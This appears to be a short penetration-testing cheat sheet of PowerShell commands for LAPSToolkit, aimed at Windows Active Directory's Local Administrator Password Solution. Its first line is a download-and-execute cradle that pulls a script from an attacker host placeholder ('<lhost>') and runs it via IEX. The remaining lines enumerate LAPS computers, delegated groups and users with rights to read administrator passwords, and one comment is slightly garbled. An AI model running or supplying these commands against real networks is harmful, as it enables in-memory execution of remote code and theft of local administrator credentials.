% LAPS, passwords, Local, Administrator, Password, Solution

# laps toolkitttps://github.com/leoloobeek/LAPSToolkit powershell
(new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1 

# laps toolkit - Get laps computer
Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers 

# laps toolkit - find LAPS Delegated Groups
Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups 

# laps toolkit - Find users with Extended rights
Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights 
